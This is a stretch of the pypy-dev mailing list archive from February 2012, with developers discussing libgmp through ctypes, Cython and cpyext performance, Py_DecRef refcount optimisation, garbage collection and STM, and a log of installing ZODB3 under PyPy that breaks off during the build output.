2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Thu, 23 Feb 2012 19:18:36 -0700 Subject: [pypy-dev] libgmp In-Reply-To: References: Message-ID: On Thu, Feb 23, 2012 at 6:56 PM, Timothy Baldridge wrote: > For a project I'm working on, I'd like to have support for gmp in > pypy. I have a ctypes pypy module, but from what I understand, pypy's > ctypes are a bit slow compared to CPython. What's the best way to get > access to get access to libgmp from python? Would you be against a > pull request that added libgmp as an RPython module? > > Thanks > > Timothy Hi PyPy's ctypes story is a kind of sad one. There was an attempt to make it fast, but it's definitely unfinished. If you hit the correct sweet spot of ctypes, it's super-fast, much faster than cpython. If you however don't, it's slow. Maybe you can show a concrete usecase and I can try and speed it up? I suppose ctypes is the advertised way of accessing C from PyPy for now. Cheers, fijal From fijall at gmail.com Fri Feb 24 03:24:44 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Thu, 23 Feb 2012 19:24:44 -0700 Subject: [pypy-dev] libgmp In-Reply-To: References: Message-ID: On Thu, Feb 23, 2012 at 7:06 PM, William ML Leslie wrote: > On 24 February 2012 13:05, William ML Leslie > wrote: >> On 24 February 2012 12:56, Timothy Baldridge wrote: >>> For a project I'm working on, I'd like to have support for gmp in >>> pypy. I have a ctypes pypy module, but from what I understand, pypy's >>> ctypes are a bit slow compared to CPython. >> >> On the contrary, ctypes is particularly fast on pypy for common usage. >> ?Does your benchmark get to the point of JITting it? > > Sorry, forgot to reply-all. That's not entirely true. You can debate what "common usage" means, but I had issues hitting the sweet spot. From stefan_ml at behnel.de Fri Feb 24 09:17:13 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Fri, 24 Feb 2012 09:17:13 +0100 Subject: [pypy-dev] libgmp In-Reply-To: References: Message-ID: Maciej Fijalkowski, 24.02.2012 03:18: > On Thu, Feb 23, 2012 at 6:56 PM, Timothy Baldridge wrote: >> For a project I'm working on, I'd like to have support for gmp in >> pypy. I have a ctypes pypy module, but from what I understand, pypy's >> ctypes are a bit slow compared to CPython. What's the best way to get >> access to get access to libgmp from python? Would you be against a >> pull request that added libgmp as an RPython module? > > PyPy's ctypes story is a kind of sad one. There was an attempt to make > it fast, but it's definitely unfinished. If you hit the correct sweet > spot of ctypes, it's super-fast, much faster than cpython. If you > however don't, it's slow. Maybe you can show a concrete usecase and I > can try and speed it up? Yep, benchmarking the obvious solution instead of stepping right into the optimisation is *always* a good idea. > I suppose ctypes is the advertised way of accessing C from PyPy for now. Sorry for bringing up this topic again, but I know that loads of people in the Cython community are rather happy users of gmp. Sage contains quite a bit of gmp code, for example, and random people keep mentioning their own usage of it on the cython-users mailing list quite frequently. At least, there should be some code around to build on. So, as a reply to the OP: seeing the current advances in getting Cython code to run in PyPy (interfacing at the C-API level), another option would be to do exactly as you would in CPython and implement the performance critical parts of the code that heavily rely on gmp interaction in Cython (to get plain C code out of it), and then import and use that from PyPy, but at a much higher level than with direct individual calls to the gmp functions. However much faster ctypes can be in PyPy than in CPython, you just can't beat the performance of a straight block of C code when the goal is to talk to C code. Cython will also allow you to run code in parallel with OpenMP, in case you need that. Depending on your needs, that approach could reduce the amount of interfacing to a minimum, thus equally reducing the chance of running into performance problems with ctypes. PyPy support for Cython is not released yet and still hasn't left the alpha quality stage. However, if it works, it works. You can find it here: https://github.com/scoder/cython And you will most likely also need a nightly build of PyPy. Stefan From arigo at tunes.org Fri Feb 24 09:48:02 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 24 Feb 2012 09:48:02 +0100 Subject: [pypy-dev] libgmp In-Reply-To: References: Message-ID: Hi Stefan, On Fri, Feb 24, 2012 at 09:17, Stefan Behnel wrote: > However much faster ctypes can be in PyPy than in CPython, you > just can't beat the performance of a straight block of C code when the goal > is to talk to C code. That's wrong from a pypy point of view --- or at least not helpful. Right now, if your stars are correctly aligned and all the ctypes calls use the fast path, then pypy generates a block of assembler containing the direct calls to C code. While not strictly the same performance as a good optimizing compiler, the difference should not be measurable in this case. Not to mention that Cython code linked as a cpyext module for pypy is going to interface very slowly with the rest of pypy. If you need to exchange the gmp values between Python and the gmp library, then Cython looses on pypy. (Stefan, it seems like you are regularly using the pypy list to make the promotion of Cython. While I have nothing against Cython, your knowledge about pypy appears to be superficial. So may I please ask you to stop? Thank you.) A bient?t, Armin. From amauryfa at gmail.com Fri Feb 24 10:27:30 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Fri, 24 Feb 2012 10:27:30 +0100 Subject: [pypy-dev] libgmp In-Reply-To: References: Message-ID: Hi Stefan, 2012/2/24 Stefan Behnel > So, as a reply to the OP: seeing the current advances in getting Cython > code to run in PyPy (interfacing at the C-API level), another option would > be to do exactly as you would in CPython and implement the performance > critical parts of the code that heavily rely on gmp interaction in Cython > (to get plain C code out of it), and then import and use that from PyPy, > but at a much higher level than with direct individual calls to the gmp > functions. However much faster ctypes can be in PyPy than in CPython, you > just can't beat the performance of a straight block of C code when the goal > is to talk to C code. Cython will also allow you to run code in parallel > with OpenMP, in case you need that. > Cython won't be fast with PyPy. The C code it generates is too much specialized for CPython. For example, I've seen huge slowdowns in the Cython program itself (while compiling lxml, for example) when the various Cython extension modules (Nodes.c for example) started to compile and became available for pypy. I was about to write the list of operations that cpyext performs for PyTuple_GET_ITEM, but this macro is too large to fit in the margin :-) And PyDict_Next is a nightmare: https://bitbucket.org/pypy/pypy/src/9f0e8a37712b/pypy/module/cpyext/dictobject.py#cl-177 It's one thing to be able to run lxml and other Cython-based libraries with pypy. it's another thing to pretend that Cython is the way to write fast modules on pypy. You may win on the generated C code, but will loose when interfacing with the rest of the Python interpreter (which is also the reason why ctypes is so slow). This said, I've added all the functions you mentioned in a previous email. You may try your tests again with the nightly build. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Fri Feb 24 11:32:07 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Fri, 24 Feb 2012 11:32:07 +0100 Subject: [pypy-dev] Cython and cpyext performance (was: Re: libgmp) In-Reply-To: References: Message-ID: Hi Amaury, Amaury Forgeot d'Arc, 24.02.2012 10:27: > 2012/2/24 Stefan Behnel >> So, as a reply to the OP: seeing the current advances in getting Cython >> code to run in PyPy (interfacing at the C-API level), another option would >> be to do exactly as you would in CPython and implement the performance >> critical parts of the code that heavily rely on gmp interaction in Cython >> (to get plain C code out of it), and then import and use that from PyPy, >> but at a much higher level than with direct individual calls to the gmp >> functions. However much faster ctypes can be in PyPy than in CPython, you >> just can't beat the performance of a straight block of C code when the goal >> is to talk to C code. Cython will also allow you to run code in parallel >> with OpenMP, in case you need that. > > Cython won't be fast with PyPy. The C code it generates is too much > specialized for CPython. Well, you have to distinguish between the C code it generates and the C-API calls that it generates to emulate Python semantics. The C code itself isn't impacted by PyPy. There are quite a lot of people who use Cython because it gives them plain C with a friendly syntax and Python features when they need them (e.g. for exceptions). > For example, I've seen huge slowdowns in the Cython program itself (while > compiling lxml, for example) > when the various Cython extension modules (Nodes.c for example) started to > compile and became available for pypy. Right, Cython shouldn't compile itself when running in PyPy, that makes no sense at all. Note that there's a --no-cython-compile option that you can pass to setup.py. It's Python, compilation is completely optional. I'll disable it when installing in PyPy. BTW, from what I've seen so far, the compile times tend to be faster in CPython than in PyPy because even compiling something as large as lxml doesn't seem to run long enough to take much advantage of the JIT. But compiling down to cpyext and going through that is just wrong in any way. > I was about to write the list of operations that cpyext performs for > PyTuple_GET_ITEM, but this macro is too large to fit in the margin :-) Interesting. Is there a better way of doing this? CPython doesn't seem to provide a way to ask for owned references, even though Cython will quite often (but not always) call Py_INCREF() on the result anyway. Would the tuple parsing functions help, for example? There may well be cases where we could use those. Wouldn't be the first time I rewrite the function argument handling code, for example. ;-) > And PyDict_Next is a nightmare: > https://bitbucket.org/pypy/pypy/src/9f0e8a37712b/pypy/module/cpyext/dictobject.py#cl-177 Right, very good example. Looks like O(n^2), which is clearly horrible for this. Actually, even in CPython PyDict_Next() is only about 30% faster than going through the "lookup and call .iteritems() for dict, loop over the iterator" dance. I found that rather disappointing. I had always wanted to make this optimisation optional in the C code so that we can apply it optimistically at runtime to any unknown object that someone calls an ".iteritems()" method on. When I get around to finishing that up (AFAIR, I once had a half-baked patch for it), we can just as well disable it for PyPy at C compile time and always take the normal iterator path there. Looks like that would help a lot. > It's one thing to be able to run lxml and other Cython-based libraries with > pypy. > it's another thing to pretend that Cython is the way to write fast modules > on pypy. It's *one* way. I'm very well aware that it depends on the ratio of C-level code and Python-level code - we see that all the time, also in CPython. > You may win on the generated C code, but will loose when interfacing with > the rest > of the Python interpreter (which is also the reason why ctypes is so slow). Absolutely. I think that's where most of the heated misunderstandings on both sides come from. On the Cython side, the goal is to drop your code into C to make it predictably fast. On the PyPy side, the goal is to move it into Python to let the JIT do its work (and look for ways to improve the JIT if this doesn't work out). In practice, I think that either side is right for the right kind of problem. And, no, I really don't care who is "more" right. > This said, I've added all the functions you mentioned in a previous email. Very cool, thanks!! I already implemented it for Cython but hadn't push it up yet. Just in case: did you see my patch in the CPython tracker? I made PyErr_GetExcInfo() return new references and PyErr_SetExcInfo() steal the references - that behaviour fits best with all important use cases. > You may try your tests again with the nightly build. I will. Stefan From gbowyer at fastmail.co.uk Fri Feb 24 22:23:30 2012 From: gbowyer at fastmail.co.uk (Greg Bowyer) Date: Fri, 24 Feb 2012 13:23:30 -0800 Subject: [pypy-dev] Biting off more than I can chew In-Reply-To: References: <4F42DB6C.7010307@fastmail.co.uk> Message-ID: <4F47FFD2.8020600@fastmail.co.uk> Thats pretty awesome. So if anyone else is willing to join in a challange, I have an example first steps piece of C that uses the azul interfaces to attempt to grab a blob of memory. https://bitbucket.org/GregBowyer/pypy-c4gc/raw/1889f31b43e5/azm_mem_test/test.c I was expecting my code to not work for the printf, however it does not actually seem to do the mreserve Anyone want to join my insanity ? -- Greg On 20/02/12 16:24, Amaury Forgeot d'Arc wrote: > 2012/2/21 Greg Bowyer > > > My question (probably one of many to irritate and annoy all the > fine folks here) would be, is there a sensible way to compile into > pypy a small amount of C code that can be used to bootstrap and > bridge some esoteric c libraries into pypy, the code that I want > to run, on startup of pypy would be the following > https://bitbucket.org/GregBowyer/pypy-c4gc/changeset/0de575b3a8d1#chg-azm_mem_test/test.c > > > It's not annoying at all, we use it in strategic places. > For example, see how pypy/rlib/_rffi_stacklet.py implements a > stacklet C library that can be used in RPython. > > It uses an "ExternalCompilationInfo" (eci) object: > - separate_module_files lists the .c files you want to compile and link > - separate_module_sources is an easy way to embed C snippets (each > source will create a .c file) > > Then you can use rffi.llexternal with "compilation_info=eci" > to declare a function defined in this library. > > -- > Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From stefan_ml at behnel.de Sat Feb 25 10:14:08 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 25 Feb 2012 10:14:08 +0100 Subject: [pypy-dev] Cython and cpyext performance In-Reply-To: References: Message-ID: Stefan Behnel, 24.02.2012 11:32: > Amaury Forgeot d'Arc, 24.02.2012 10:27: >> I was about to write the list of operations that cpyext performs for >> PyTuple_GET_ITEM, but this macro is too large to fit in the margin :-) > > Interesting. Is there a better way of doing this? CPython doesn't seem to > provide a way to ask for owned references, even though Cython will quite > often (but not always) call Py_INCREF() on the result anyway. Would the > tuple parsing functions help, for example? There may well be cases where we > could use those. Wouldn't be the first time I rewrite the function argument > handling code, for example. ;-) What do you think of this proposal? http://bugs.python.org/issue14121 Stefan From stefan_ml at behnel.de Sat Feb 25 18:10:10 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sat, 25 Feb 2012 18:10:10 +0100 Subject: [pypy-dev] crash in cpyext dict iteration Message-ID: Hi, I've rewritten Cython's dict iteration code to use normal PyIter_Next() iteration on PyPy, but now I get a crash in one of the tests. Apparently, the iterator fails to raise an exception when the dict is being resized during iteration. The test goes like this: ''' def iterdict_change_size(dict d): """ >>> count, i = 0, -1 >>> d = {1:2, 10:20} >>> for i in d: ... d[i+1] = 5 ... count += 1 ... if count > 5: ... break # safety Traceback (most recent call last): RuntimeError: dictionary changed size during iteration >>> iterdict_change_size({1:2, 10:20}) Traceback (most recent call last): RuntimeError: dictionary changed size during iteration >>> print( iterdict_change_size({}) ) DONE """ cdef int count = 0 i = -1 for i in d: d[i+1] = 5 count += 1 if count > 5: break # safety return "DONE" ''' It's supposed to raise an exception when starting the second iteration, but in PyPy, it crashes at that point instead. Stefan From arigo at tunes.org Sat Feb 25 18:36:43 2012 From: arigo at tunes.org (Armin Rigo) Date: Sat, 25 Feb 2012 18:36:43 +0100 Subject: [pypy-dev] Biting off more than I can chew In-Reply-To: <4F47FFD2.8020600@fastmail.co.uk> References: <4F42DB6C.7010307@fastmail.co.uk> <4F47FFD2.8020600@fastmail.co.uk> Message-ID: Hi Greg, On Fri, Feb 24, 2012 at 22:23, Greg Bowyer wrote: > So if anyone else is willing to join in a challange, I have an example first > steps piece of C that uses the azul interfaces to attempt to grab a blob of > memory. Unsure how well using C code for the GC would work. Also, if you're thinking about STM specifically, note that it needs to be integrated with a special GC --- or at least, not strictly *needs* to, but if it is, we can design a much more efficient overall way to have STM. (This is documented in https://bitbucket.org/pypy/extradoc/raw/extradoc/planning/stm.txt , together with a plan for a simple STM-specific GC, which is partially implemented.) A bient?t, Armin. From arigo at tunes.org Sat Feb 25 18:42:21 2012 From: arigo at tunes.org (Armin Rigo) Date: Sat, 25 Feb 2012 18:42:21 +0100 Subject: [pypy-dev] Biting off more than I can chew In-Reply-To: References: <4F42DB6C.7010307@fastmail.co.uk> <4F47FFD2.8020600@fastmail.co.uk> Message-ID: Re-hi, Ah, another matter. I don't know how interesting the goal of a no-pause GC is together with STM. It would seem to me that STM is, by itself, not really well-suited if you want to absolutely avoid pauses: if a transaction is aborted a few times before eventually succeeding to commit, then you have an unexpected pause between the time were the transaction was first started and the time were it committed. I think it's a built-in property of all transactional memory systems to not be really "real-time safe". Maybe they can be made real-time safe by falling back to nontransactional single-threaded execution at some point, but that looks more advanced that I care for right now. A bient?t, Armin. From stefan_ml at behnel.de Sun Feb 26 09:50:11 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 26 Feb 2012 09:50:11 +0100 Subject: [pypy-dev] Py_DecRef() in cpyext Message-ID: Hi, having rewritten Cython's dict iteration to use normal iteration, I ran a little benchmark for comparison and it turned out to be (algorithmically) faster by more than an order of magnitude for a dict with 1000 items. That's pretty decent, although it's still about 100x slower than in CPython. I'm sure and certain that there's much more of this low hanging fruit to find all over the place. Next, I ran callgrind over my little benchmark and it showed that the dominating part of the running time had shifted from 99% in PyDict_Next() to 56% in Py_DecRef(). Sadly, there wasn't much more to be read out of it, because the graph was just full of hex numbers instead of names. To be attributed to the JIT compiled code, I guess. Looking at Py_DecRef(), however, left me somewhat baffled. I would have expected this to be the most intensively tuned function in all of cpyext, but it even started with this comment: """ # XXX Optimize these functions and put them into macro definitions """ Ok, sounds reasonable. Should have been done already, though. Especially when I took a look at object.h and saw that the Py_DECREF() macro *always* calls into it. Another surprise. I had understood in previous discussions that the refcount emulation in cpyext only counts C references, which I consider a suitable design. (I guess something as common as Py_None uses the obvious optimisation of always having a ref-count > 1, right? At least when not debugging...) So I changed the macros to use an appropriate C-level implementation: """ #define Py_INCREF(ob) ((((PyObject *)ob)->ob_refcnt > 0) ? \ ((PyObject *)ob)->ob_refcnt++ : (Py_IncRef((PyObject *)ob))) #define Py_DECREF(ob) ((((PyObject *)ob)->ob_refcnt > 1) ? \ ((PyObject *)ob)->ob_refcnt-- : (Py_DecRef((PyObject *)ob))) #define Py_XINCREF(op) do { if ((op) == NULL) ; else Py_INCREF(op); \ } while (0) #define Py_XDECREF(op) do { if ((op) == NULL) ; else Py_DECREF(op); \ } while (0) """ to tell the C compiler that it doesn't actually need to call into PyPy in most cases (note that I didn't use any branch prediction macros, but that shouldn't change all that much anyway). This shaved off a couple of cycles from my iteration benchmark, but much less than I would have liked. My intuition tells me that this is because almost all objects that appear in the benchmark are actually short-lived in C space so that pretty much every Py_DECREF() on them kills them straight away and thus calls into Py_DecRef() anyway. To be verified with a better test. I think this could be fixed in some way by figuring out if there is at least one live reference to it inside of PyPy (which is usually the case for container iteration and parameters, for example), and as long as that's the case, add one to the refcount to keep C code from needing to call back into PyPy unnecessarily. A finaliser could do that, I guess. Ok, next, I looked at the Py_DecRef() implementation itself and found it to be rather long. Since I wasn't sure what the JIT would make of it, please don't shout at me if any of the following comments ("^^") make no sense. @cpython_api([PyObject], lltype.Void) def Py_DecRef(space, obj): if not obj: return ^^ this would best be handled right in C space to avoid unnecessary call overhead and to allow the C compiler to drop this test when possible. assert lltype.typeOf(obj) == PyObject obj.c_ob_refcnt -= 1 if DEBUG_REFCOUNT: debug_refcount("DECREF", obj, obj.c_ob_refcnt, frame_stackdepth=3) ^^ ok, I assume debug code will automatically be removed completely if obj.c_ob_refcnt == 0: state = space.fromcache(RefcountState) ptr = rffi.cast(ADDR, obj) if ptr not in state.py_objects_r2w: # this is a half-allocated object, lets call the deallocator # without modifying the r2w/w2r dicts _Py_Dealloc(space, obj) ^^ this looks like an emergency special case to me - shouldn't be on the fast path... else: w_obj = state.py_objects_r2w[ptr] ^^ here, I wonder if the JIT is smart enough to detect the double weakref dict lookup in the (I guess) 99% code path and folds it into one? ^^ I actually wonder why this needs to use a weakref dict instead of a normal dict. It's ref-counted after all, so we *know* there's a live reference to it until further notice. Are weakref dicts as fast as normal dicts in PyPy? del state.py_objects_r2w[ptr] w_type = space.type(w_obj) if not w_type.is_cpytype(): _Py_Dealloc(space, obj) del state.py_objects_w2r[w_obj] # if the object was a container for borrowed references state.delete_borrower(w_obj) ^^ in some place here, I would have expected the use of a freelist for the C space object representations in order to avoid unnecessary allocations, especially for things like short tuples etc. Is this hidden somewhere else? Or does PyPy's runtime handle this kind of caching internally somewhere? else: if not we_are_translated() and obj.c_ob_refcnt < 0: message = "Negative refcount for obj %s with type %s" % ( obj, rffi.charp2str(obj.c_ob_type.c_tp_name)) print >>sys.stderr, message assert False, message ^^ This will also vanish automatically, right? So, from a quick and shallow look, it seems to me that this code could be improved. By taking work off the fast paths and avoiding create-delete cycles, something as ubiquitous as this function could help in making C-API code run a lot faster. Stefan From stefan_ml at behnel.de Sun Feb 26 11:00:01 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 26 Feb 2012 11:00:01 +0100 Subject: [pypy-dev] Py_DecRef() in cpyext In-Reply-To: References: Message-ID: Stefan Behnel, 26.02.2012 09:50: > when I took a look at object.h and saw that the Py_DECREF() macro *always* > calls into it. Another surprise. > > I had understood in previous discussions that the refcount emulation in > cpyext only counts C references, which I consider a suitable design. (I > guess something as common as Py_None uses the obvious optimisation of > always having a ref-count > 1, right? At least when not debugging...) > > So I changed the macros to use an appropriate C-level implementation: > > """ > #define Py_INCREF(ob) ((((PyObject *)ob)->ob_refcnt > 0) ? \ > ((PyObject *)ob)->ob_refcnt++ : (Py_IncRef((PyObject *)ob))) > > #define Py_DECREF(ob) ((((PyObject *)ob)->ob_refcnt > 1) ? \ > ((PyObject *)ob)->ob_refcnt-- : (Py_DecRef((PyObject *)ob))) > > #define Py_XINCREF(op) do { if ((op) == NULL) ; else Py_INCREF(op); \ > } while (0) > > #define Py_XDECREF(op) do { if ((op) == NULL) ; else Py_DECREF(op); \ > } while (0) > """ > > to tell the C compiler that it doesn't actually need to call into PyPy in > most cases (note that I didn't use any branch prediction macros, but that > shouldn't change all that much anyway). This shaved off a couple of cycles > from my iteration benchmark, but much less than I would have liked. My > intuition tells me that this is because almost all objects that appear in > the benchmark are actually short-lived in C space so that pretty much every > Py_DECREF() on them kills them straight away and thus calls into > Py_DecRef() anyway. To be verified with a better test. Ok, here's a stupid micro-benchmark for ref-counting: def bench(x): cdef int i for i in xrange(10000): a = x b = x c = x d = x e = x f = x g = x Leads to the obvious C code. :) (and yes, this will eventually stop actually being a benchmark in Cython...) When always calling into Py_IncRef() and Py_DecRef(), I get this $ pypy -m timeit -s 'from refcountbench import bench' 'bench(10)' 1000 loops, best of 3: 683 usec per loop With the macros above, I get this: $ pypy -m timeit -s 'from refcountbench import bench' 'bench(10)' 1000 loops, best of 3: 385 usec per loop So that's better by almost a factor of 2, just because the C compiler can handle most of the ref-counting internally once there is more than one C reference to an object. It will obviously be a lot less than that for real-world code, but I think it makes it clear enough that it's worth putting some effort into ways to avoid calling back and forth across the border for no good reason. Stefan From arigo at tunes.org Sun Feb 26 11:09:36 2012 From: arigo at tunes.org (Armin Rigo) Date: Sun, 26 Feb 2012 11:09:36 +0100 Subject: [pypy-dev] Py_DecRef() in cpyext In-Reply-To: References: Message-ID: Hi Stefan, On Sun, Feb 26, 2012 at 09:50, Stefan Behnel wrote: > Looking at Py_DecRef(), however, left me somewhat baffled. I would have > expected this to be the most intensively tuned function in all of cpyext, > but it even started with this comment: (...) Indeed, it's an obvious starting place if we want to optimize cpyext (which did not occur at all so far). You are welcome to try. Note that the JIT has nothing to do here: we cannot JIT any code written in C, and it makes no sense to apply the JIT on a short RPython callback alone. But because most of the code in module/cpyext/ is RPython code, it means it gets turned into equivalent C code statically, with (as you noticed) the debugging checks constant-folded away. The first thing to try would be to rethink how the PyPy object and the PyObject are linked together. Right now it's done with two (possibly weak) dictionaries, one for each direction. We can at least improve the situation by having a normal field in the PyObject pointing back to the PyPy object. This needs to be done carefully but can be done. The issue is that the GC needs to know about this field. It would probably require something like: allocate some GcArrays of PyObject structures (not pointers, directly PyObjects --- which have all the same size here, so it works). Use something like 100 PyObject structures per GcArray, and collect all the GcArrays in a global list. Use a freelist for dead entries. If you allocate each GcArray as "non-movable", then you can take pointers to the PyObjects and pass them to C code. As they are inside the regular GcArrays, they are GC-tracked and can contain a field that points back to the PyPy object. A bient?t, Armin. From stefan_ml at behnel.de Sun Feb 26 12:31:26 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 26 Feb 2012 12:31:26 +0100 Subject: [pypy-dev] Py_DecRef() in cpyext In-Reply-To: References: Message-ID: Hi Armin, Armin Rigo, 26.02.2012 11:09: > On Sun, Feb 26, 2012 at 09:50, Stefan Behnel wrote: >> Looking at Py_DecRef(), however, left me somewhat baffled. I would have >> expected this to be the most intensively tuned function in all of cpyext, >> but it even started with this comment: (...) > > Indeed, it's an obvious starting place if we want to optimize cpyext > (which did not occur at all so far). You are welcome to try. Looks like it's worth it. > Note > that the JIT has nothing to do here: we cannot JIT any code written in > C ... obviously - and there's C compilers for that anyway. > and it makes no sense to apply the JIT on a short RPython callback > alone. I can't see why that would be so. Just looking at Py_DecRef(), I can see lots of places where cross-function runtime optimisations would make sense, for example. I'm sure a C compiler will have a hard time finding the right fast path in there. > But because most of the code in module/cpyext/ is RPython > code, it means it gets turned into equivalent C code statically Interesting. Given PyPy's reputation of taking tons of resources to build, I assume you apply WPA to the sources in order to map them to C? Then why wouldn't I get better traces from gdb and valgrind for the generated code? Is it just that the nightly builds lack debugging symbols? > The first thing to try would be to rethink how the PyPy object and the > PyObject are linked together. Right now it's done with two (possibly > weak) dictionaries, one for each direction. We can at least improve > the situation by having a normal field in the PyObject pointing back > to the PyPy object. This needs to be done carefully but can be done. Based on my experience with lxml, such a change is absolutely worth any hassle. > The issue is that the GC needs to know about this field. It would > probably require something like: allocate some GcArrays of PyObject > structures (not pointers, directly PyObjects --- which have all the > same size here, so it works). Use something like 100 PyObject > structures per GcArray, and collect all the GcArrays in a global list. > Use a freelist for dead entries. If you allocate each GcArray as > "non-movable", then you can take pointers to the PyObjects and pass > them to C code. As they are inside the regular GcArrays, they are > GC-tracked and can contain a field that points back to the PyPy > object. Sounds like a good idea to me. Stefan From arigo at tunes.org Sun Feb 26 13:29:50 2012 From: arigo at tunes.org (Armin Rigo) Date: Sun, 26 Feb 2012 13:29:50 +0100 Subject: [pypy-dev] Py_DecRef() in cpyext In-Reply-To: References: Message-ID: Hi, On Sun, Feb 26, 2012 at 12:31, Stefan Behnel wrote: > Interesting. Given PyPy's reputation of taking tons of resources to build, > I assume you apply WPA to the sources in order to map them to C? Yes. Please read more about it starting for example from here: http://doc.pypy.org/en/latest/architecture.html > Then why > wouldn't I get better traces from gdb and valgrind for the generated code? > Is it just that the nightly builds lack debugging symbols? Yes. With a proper debugging build you get at least the intermediate C code. Not extremely readable but at least you can follow it. A bient?t, Armin. From stefan_ml at behnel.de Sun Feb 26 20:54:57 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 26 Feb 2012 20:54:57 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Amaury Forgeot d'Arc, 18.02.2012 15:41: > 2012/2/18 Stefan Behnel >> Here's an example. >> >> Python code: >> >> def print_excinfo(): >> print(sys.exc_info()) >> >> Cython code: >> >> from stuff import print_excinfo >> >> try: >> raise TypeError >> except TypeError: >> print_excinfo() >> >> With the code removed, Cython will not store the TypeError in >> sys.exc_info(), so the Python code cannot see it. This may seem like an >> unimportant use case (who uses sys.exc_info() anyway, right?), but this >> becomes very visible when the code that uses sys.exc_info() is not user >> code but CPython itself, e.g. when raising another exception or when >> inspecting frames. Things grow really bad here, especially in Python 3. > > I think I understand now, thanks for your example. > Things are a bit simpler in PyPy because these exceptions are > stored in the frame that is currently handling it. At least better than > CPython > which stores it in one place, and has to somehow save the state of the > previous frames. > Did you consider adding such a function to CPython? > "PyErr_SetCurrentFrameExceptionInfo"? > > For the record, pypy could implement it as: > space.getexecutioncontext().gettopframe_nohidden().last_exception = > operationerr > i.e. the thing returned by sys.exc_info(). I've dropped a patch for CPython in the corresponding tracker ticket: http://bugs.python.org/issue14098 The (trivial) implementation of the two functions is at the end of this file: http://bugs.python.org/file24613/exc_info_capi.patch Could you add them to PyPy? Thanks! Stefan From asouzaleite at gmx.de Mon Feb 27 10:53:26 2012 From: asouzaleite at gmx.de (Aroldo Souza-Leite) Date: Mon, 27 Feb 2012 10:53:26 +0100 Subject: [pypy-dev] ZODB3 In-Reply-To: References: Message-ID: <4F4B5296.6050903@gmx.de> Hi list, just to keep you informed: the ZODB3 can be successfully installed in a PyPy-1.8 virtual environment, but the tests fail. Below is the whole bash session I tried on Ubuntu LTS. For the PyPy developers the interesting part might be the last section, "Running the ZODB3 tests". Thanks for the great job you are doing. Aroldo. Installing ZODB3 in a PyPy virtualenv ===================================== Ubuntu Lucid Lynx (LTS) 2012-02-29 Verifying the virtualenv ------------------------ :: (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ env|grep ENV VIRTUAL_ENV=/home/aroldo/tmp/python/tmp-env-pypy PIP_ENVIRONMENT=/home/aroldo/tmp/python/tmp-env-pypy (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ python --version Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 19:41:19) [PyPy 1.8.0 with GCC 4.4.3] (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ which pip /home/aroldo/tmp/python/tmp-env-pypy/bin/pip Installing the zodb3 (using pip) --------------------------------- :: (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ pip install zodb3 Downloading/unpacking zodb3 Downloading ZODB3-3.10.5.tar.gz (706Kb): 706Kb downloaded Running setup.py egg_info for package zodb3 Downloading/unpacking transaction>=1.1.0 (from zodb3) Downloading transaction-1.2.0.tar.gz (42Kb): 42Kb downloaded Running setup.py egg_info for package transaction Downloading/unpacking zc.lockfile (from zodb3) Downloading zc.lockfile-1.0.0.tar.gz Running setup.py egg_info for package zc.lockfile Downloading/unpacking ZConfig (from zodb3) Downloading ZConfig-2.9.2.tar.gz (261Kb): 261Kb downloaded Running setup.py egg_info for package ZConfig Downloading/unpacking zdaemon (from zodb3) Downloading zdaemon-2.0.4.tar.gz (42Kb): 42Kb downloaded Running setup.py egg_info for package zdaemon Downloading/unpacking zope.event (from zodb3) Downloading zope.event-3.5.1.tar.gz Running setup.py egg_info for package zope.event Downloading/unpacking zope.interface (from zodb3) Downloading zope.interface-3.8.0.tar.gz (111Kb): 111Kb downloaded Running setup.py egg_info for package zope.interface Requirement already satisfied (use --upgrade to upgrade): setuptools in ./site- packages/setuptools-0.6c11-py2.7.egg (from zc.lockfile->zodb3) Installing collected packages: zodb3, transaction, zc.lockfile, ZConfig, zdaemo n, zope.event, zope.interface Running setup.py install for zodb3 building 'BTrees._OOBTree' extension cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/BTrees/_OOBTree.c -o build/temp.linux-i686-2.7/src/BTrees/_OOBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_OOBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_OOBTree.pypy-18.so building 'BTrees._IOBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_IOBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_IOBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_IOBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_IOBTree.pypy-18.so building 'BTrees._OIBTree' extension cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/BTrees/_OIBTree.c -o build/temp.linux-i686-2.7/src/BTrees/_OIBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_OIBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_OIBTree.pypy-18.so building 'BTrees._IIBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c 